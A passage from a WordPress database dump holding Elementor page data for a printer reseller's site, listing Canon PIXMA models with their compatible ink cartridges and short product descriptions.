align=\\\"center\\\">\\n    <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n    <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX308<\\/td>\\n    <td>CL-41 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-831 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-40 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-40\\/CL-41 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-830 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX328<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX338<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX347<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX366<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MX426<\\/td>\\n    <td>CL-811 (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CL-811XL (Colour)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810 Twin Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810\\/CL-811 Value Pack<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PG-810XL (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX876<\\/td>\\n    <td>CLI-821 (Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-821 (Yellow)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-820 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MX886<\\/td>\\n    <td>CLI-726 (Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>CLI-726 (Yellow)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-725 (Pigment Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA PRO-1<\\/td>\\n    <td>PGI-29 (Chroma Optimizer)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Dark Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Light Gray)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Matte Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Black)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Cyan)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Photo Magenta)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Red)<\\/td>\\n  <\\/tr>\\n  <tr>\\n    <td>PGI-29 (Yellow)<\\/td>\\n  <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\">\\n<tbody>\\n<tr>\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA PRO-10<\\/td>\\n<td width=\\\"208\\\">PGI-72 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-72 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-72 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-72 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-72 (Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-72 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-72 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-72 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-72 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-72 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA PRO-100<\\/td>\\n<td width=\\\"208\\\">CLI-42 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-42 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-42 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-42 (Light Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-42 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-42 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-42 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-42 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA TR8570<\\/td>\\n<td width=\\\"208\\\">CLI-781 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-781 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-781 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-781 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-781XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-781XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-781XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-781XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-780 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-780XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA TS207<\\/td>\\n<td width=\\\"208\\\">CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA TS307<\\/td>\\n<td width=\\\"208\\\">CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA TS5070<\\/td>\\n<td width=\\\"208\\\">CLI-771 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-771 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-771 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-771 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-771XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-771XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-771XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-771XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-770 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-770XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA TS5170<\\/td>\\n<td width=\\\"208\\\">CL-741 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CL-741XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PG-740 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PG-740\\/CL-741 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PG-740XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7134,3333,'_wp_page_template','template-fullwidth.php'),(7135,3333,'_elementor_edit_mode','builder'),(7136,3333,'_elementor_template_type','post'),(7137,3333,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" 